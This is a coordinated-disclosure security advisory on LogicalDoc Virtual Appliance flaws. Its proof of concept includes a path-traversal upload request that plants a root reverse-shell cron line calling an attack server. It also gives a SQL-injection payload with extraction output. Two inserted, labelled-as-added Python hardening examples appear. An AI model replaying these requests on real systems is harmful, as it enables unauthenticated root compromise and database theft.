LogicalDoc Virtual Appliance Multiple Vulnerabilities

Advisory ID Internal
CORE-2020-004

1. Advisory Information

Title: LogicalDoc Virtual Appliance Multiple Vulnerabilities
Advisory ID: CORE-2020-004
Date published: 2020-03-18
Date of last update: 2020-03-17
Vendors contacted: LogicalDoc
Release mode: Coordinated release

2. Vulnerability Information

Class: Unrestricted Upload of File with Dangerous Type [CWE-434], Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') [CWE-22], SQL Injection [CWE-89]
Impact: Code execution allows privilege escalation
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2020-9423; CVE-2020-10365

3. Vulnerability Description

LogicalDoc [1] is a global software company that sells an enterprise document management system (DMS) designed to provide administration and serve as a repository for an organization’s content.

Multiple vulnerabilities were found in the Virtual Appliance version, which would allow a remote unauthenticated attacker to upload arbitrary files that could lead to the execution of arbitrary commands with root privileges.

4. Vulnerable Packages

  • LogicalDoc 8.3.1
  • LogicalDoc 8.3

Other products and versions might be affected, but they were not tested.

5. Vendor Information, Solutions, and Workarounds

LogicalDoc published a patched version of the product on 2019-08-30 with the 8.3.3 release which fixes these issues.

6. Credits

These vulnerabilities were discovered and researched by Ivan Huertas from Core Security Consulting Services.

The publication of this advisory was coordinated by Pablo A. Zurro from Core Advisories Team.

7. Technical Description / Proof of Concept Code

LogicalDoc Virtual Appliance is a free virtual appliance version of the LogicalDoc Document Management tool. It is designed to be deployed inside an organization's network infrastructure. It comes bundled with a Web Management Console for documents, messaging systems, user management, and other services.

Multiple vulnerabilities were found in the context of this appliance, which could allow a remote attacker to compromise the whole system. The vulnerabilities described in 7.1 and 7.2 could allow an attacker to upload arbitrary files, leading to command execution, and to dump data from the database.

7.1 Arbitrary file upload leading to remote command execution

[CVE-2020-9423] LogicalDoc provides functionality to add documents. Those documents can then be used for multiple tasks, such as version control, sharing among users, applying tags, etc. This functionality could be abused by an unauthenticated attacker to upload an arbitrary file to a restricted folder, leading to the execution of malicious commands with root privileges.

The following proof of concept demonstrates the vulnerability. First, we used the mechanism called "Add Documents" to add a new document at the following path: /frontend/document. A pop-up appears where multiple files can be dragged and dropped. In the background, a request to /servlet.gupld is performed. This servlet is vulnerable to an arbitrary file upload and a path traversal, as we are able to change the path by inserting ../ characters in the name parameter of the request.

As an extra verification, we performed this exact request without providing a session cookie, trying to store the file in the /etc/cron.d/ directory. The file contained commands to execute a reverse shell to our attack server. This confirmed that an unauthenticated attacker could exploit this issue.

POST /servlet.gupld HTTP/1.1
Host: 10.106.91.25
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------675725876718999651035521338
Content-Length: 321
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------675725876718999651035521338
Content-Disposition: form-data; name="../../../../../../../../etc/cron.d/partialPath"; filename="vgauth.conf"
Content-Type: text/html

* * * * * root /bin/bash -i >& /dev/tcp/10.106.91.24/8089 0>&1
-----------------------------675725876718999651035521338--

HTTP/1.1 200
Set-Cookie: JSESSIONID=931447C141982D63AAAD8A1E4BCB11E6; Path=/; HttpOnly
Cache-Control: no-cache
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src * 'unsafe-inline' 'unsafe-eval'; script-src * 'unsafe-inline' 'unsafe-eval'; connect-src * 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src 'self' https://*.google.com https://*.zoho.com ; frame-ancestors *; style-src * 'unsafe-inline';
Content-Type: text/plain;charset=UTF-8
Date: Tue, 16 Jul 2019 16:47:38 GMT
Connection: close
Server: Undisclosed/8.41
Content-Length: 441

%%%INI%%%@@^^^?xml version="1.0" encoding="UTF-8"?^^^@@
@@^^^response^^^@@@@^^^files^^^@@@@^^^file^^^@@@@^^^ctype^^^@@text/html@@^^^/ctype^^^@@
@@^^^size^^^@@63@@^^^/size^^^@@
@@^^^field^^^@@../../../../../../../../etc/cron.d/partialPath-0@@^^^/field^^^@@
@@^^^name^^^@@vgauth.conf@@^^^/name^^^@@
@@^^^/file^^^@@
@@^^^/files^^^@@
@@^^^finished^^^@@ok@@^^^/finished^^^@@
@@^^^parameters^^^@@@@^^^/parameters^^^@@
@@^^^/response^^^@@
%%%END%%%

One minute after sending the request, we received the reverse connection on our server. Since the web server is running with root privileges, our reverse shell had the maximum privileges on the system.

[.....CONSOLE ON OUR ATTACK SERVER.....]
root@kali-burp:~# nc -nlvp 8089
listening on [any] 8089 ...
connect to [10.106.91.24] from (UNKNOWN) [10.106.91.25] 33102
bash: no job control in this shell
root@logicaldoc ~]#whoami
whoami
root
root@logicaldoc ~]#
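The check that the upload path lacked can be sketched as follows. This is an added example, not code from the advisory or from LogicalDoc; the upload root, the function names and the sample multipart body (modelled on the request above, with a benign placeholder as content) are assumptions.

```python
import posixpath
import re

UPLOAD_ROOT = "/srv/app/uploads"  # assumed upload directory, not LogicalDoc's real path

# Constructed multipart part modelled on the advisory's request; body is a placeholder.
SAMPLE_BODY = (
    "-----------------------------1\r\n"
    'Content-Disposition: form-data; name="../../../../../../../../etc/cron.d/partialPath"; '
    'filename="vgauth.conf"\r\n'
    "Content-Type: text/html\r\n\r\n"
    "placeholder\r\n"
    "-----------------------------1--\r\n"
)

# \b keeps the pattern from matching the name= inside filename=
_FIELD_NAME = re.compile(r'Content-Disposition:[^\r\n]*?\bname="([^"]*)"', re.I)


def field_names(body: str) -> list[str]:
    """Return the form-field name of every part in a multipart body."""
    return _FIELD_NAME.findall(body)


def naive_target(root: str, name: str) -> str:
    """Path that an unchecked join of root and the client-supplied name resolves to."""
    return posixpath.normpath(posixpath.join(root, name))


def safe_target(root: str, name: str) -> str:
    """Resolve name under root, rejecting anything that lands outside it."""
    if "\x00" in name or name.startswith("/"):
        raise ValueError(f"rejected field name: {name!r}")
    target = posixpath.normpath(posixpath.join(root, name))
    if not target.startswith(root.rstrip("/") + "/"):
        raise ValueError(f"field name escapes upload root: {name!r}")
    # A real handler should also resolve symlinks (os.path.realpath) before this
    # check, or ignore the client-supplied name and generate one server-side.
    return target


if __name__ == "__main__":
    for name in field_names(SAMPLE_BODY):
        print("unchecked join ->", naive_target(UPLOAD_ROOT, name))
        try:
            safe_target(UPLOAD_ROOT, name)
        except ValueError as err:
            print("hardened check ->", err)
```

The same field-name extraction can be applied to captured request bodies to flag upload requests whose name parameter contains traversal sequences.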

7.2 SQL injection

[CVE-2020-10365] LogicalDoc populates the list of available documents by querying the database. This list could be filtered by modifying some of the parameters. We confirmed that some of them are not properly sanitized, which could allow an authenticated attacker to perform arbitrary queries to the database. Below is a common request to retrieve the list of documents:

GET /data/documents.xml?locale=en&folderId=4&filename=salesfusion&max=100&indexed=&page=1 HTTP/1.1
Host: 10.106.91.25
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.106.91.25/frontend.jsp
If-Modified-Since: Thu, 01 Jan 1970 00:00:00 GMT
Cookie: JSESSIONID=9DBE50DF71DF092F4CB2C01EBE5E314C; ldoc-sid=d0c30aa5-9819-4c44-917e-455155d5e93a; GLog=%7B%0A%20%20%20%20trackRPC%3Afalse%0A%7D
Connection: close

HTTP/1.1 200
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src * 'unsafe-inline' 'unsafe-eval'; script-src * 'unsafe-inline' 'unsafe-eval'; connect-src * 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src 'self' https://*.google.com https://*.zoho.com ; frame-ancestors *; style-src * 'unsafe-inline';
Content-Type: text/xml;charset=UTF-8
Content-Length: 938
Date: Tue, 16 Jul 2019 17:39:18 GMT
Connection: close
Server: Undisclosed/8.41

36044844generic1.02019-07-16T17:39:012019-07-16T17:39:012019-07-16T17:39:01734000false00false02019-07-16T04:00:00yes

Boolean-based SQL Injection is a SQL Injection technique that relies on sending an SQL query to the database which forces the application to return a different result depending on whether the query returns a TRUE or FALSE result. We tampered with the filename parameter to create a valid SQL query. Below is an example of a TRUE statement:

GET /data/documents.xml?locale=en&folderId=4&filename=salesfusion'+OR+NOT+9907%3d9907+AND+'ynwj'+LIKE+'ynwj&max=100&indexed=&page=1 HTTP/1.1
Host: 10.106.91.25
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.106.91.25/frontend.jsp
If-Modified-Since: Thu, 01 Jan 1970 00:00:00 GMT
Cookie: JSESSIONID=9DBE50DF71DF092F4CB2C01EBE5E314C; ldoc-sid=d0c30aa5-9819-4c44-917e-455155d5e93a; GLog=%7B%0A%20%20%20%20trackRPC%3Afalse%0A%7D
Connection: close

HTTP/1.1 200
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src * 'unsafe-inline' 'unsafe-eval'; script-src * 'unsafe-inline' 'unsafe-eval'; connect-src * 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src 'self' https://*.google.com https://*.zoho.com ; frame-ancestors *; style-src * 'unsafe-inline';
Content-Type: text/xml;charset=UTF-8
Content-Length: 938
Date: Tue, 16 Jul 2019 18:07:36 GMT
Connection: close
Server: Undisclosed/8.41

36044844generic1.02019-07-16T17:52:502019-07-16T17:39:012019-07-16T17:39:01734001false00false02019-07-16T04:00:00yes

Below is an extract of information retrieved by sending multiple SQL queries:

[13:37:28] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5
[13:37:28] [INFO] fetching database names
[13:37:28] [INFO] fetching number of databases
[13:37:28] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:37:28] [INFO] retrieved:
[13:37:29] [INFO] fetching current database
[13:37:29] [INFO] retrieved: logicaldoc
[13:37:31] [INFO] fetching tables for database: 'logicaldoc'
[13:37:31] [INFO] fetching number of tables for database 'logicaldoc'
[13:37:31] [INFO] retrieved:
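The difference between a concatenated and a parameterized filter can be shown with the tampered filename value from the request above. This is an added example, not LogicalDoc's code: the table schema, the query shape and the rows are assumptions, and an in-memory SQLite database stands in for the appliance's MySQL back end.

```python
import sqlite3

# The tampered filename value from the advisory's request, URL-decoded.
TAMPERED = "salesfusion' OR NOT 9907=9907 AND 'ynwj' LIKE 'ynwj"


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the document table (assumed schema and rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE documents (folder_id INTEGER, filename TEXT)")
    db.executemany(
        "INSERT INTO documents VALUES (?, ?)",
        [(4, "salesfusion"), (4, "invoice"), (5, "payroll")],
    )
    return db


def list_concatenated(db, folder_id: int, filename: str) -> list[str]:
    """Vulnerable pattern: the filter text becomes part of the SQL statement."""
    sql = (
        "SELECT filename FROM documents "
        f"WHERE folder_id = {int(folder_id)} AND filename LIKE '%{filename}%'"
    )
    return [row[0] for row in db.execute(sql)]


def list_parameterized(db, folder_id: int, filename: str) -> list[str]:
    """Fixed pattern: the filter text is bound as data and never parsed as SQL."""
    sql = "SELECT filename FROM documents WHERE folder_id = ? AND filename LIKE ?"
    return [row[0] for row in db.execute(sql, (folder_id, f"%{filename}%"))]


if __name__ == "__main__":
    db = make_db()
    # Concatenated: the quote closes the string literal, the statement still
    # parses, and the result equals the untampered one, as the advisory observed.
    print(list_concatenated(db, 4, "salesfusion"), list_concatenated(db, 4, TAMPERED))
    # Parameterized: no document is literally named like the tampered value.
    print(list_parameterized(db, 4, "salesfusion"), list_parameterized(db, 4, TAMPERED))
```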

8. Report Timeline

2019-07-18 – Core Security made initial contact with LogicalDoc, including a draft advisory with two vulnerabilities.

2019-08-30 – Vulnerabilities solved by LogicalDoc in version 8.3.3.

2020-02-26 – Applied for first CVE via MITRE website, received confirmation of application.

2020-02-28 – MITRE assigns CVE-2020-9423 to first vulnerability.

2020-03-10 – Applied for CVEs via MITRE for second vulnerability. MITRE assigns CVE-2020-10365.

2020-03-18 – Advisory published.

9. References

[1] https://www.logicaldoc.com/

10. About CoreLabs

CoreLabs, the research center of Core Security, A Fortra Company, is charged with researching and understanding security trends as well as anticipating the future requirements of information security technologies. CoreLabs studies cybersecurity trends, focusing on problem formalization, identification of vulnerabilities, novel solutions, and prototypes for new technologies. The team is comprised of seasoned researchers who regularly discover and disclose vulnerabilities, informing product owners in order to ensure a fix can be released efficiently, and that customers are informed as soon as possible. CoreLabs regularly publishes security advisories, technical papers, project information, and shared software tools for public use at www.coresecurity.com/core-labs.

11. About Core Security, A Fortra Company

Core Security, a Fortra Company, provides organizations with critical, actionable insight about who, how, and what is vulnerable in their IT environment. With our layered security approach and robust threat-aware, identity & access, network security, and vulnerability management solutions, security teams can efficiently manage security risks across the enterprise. Learn more at www.coresecurity.com.

Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or [email protected].

12. Disclaimer

The contents of this advisory are copyright (c) 2020 Core Security and (c) 2020 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/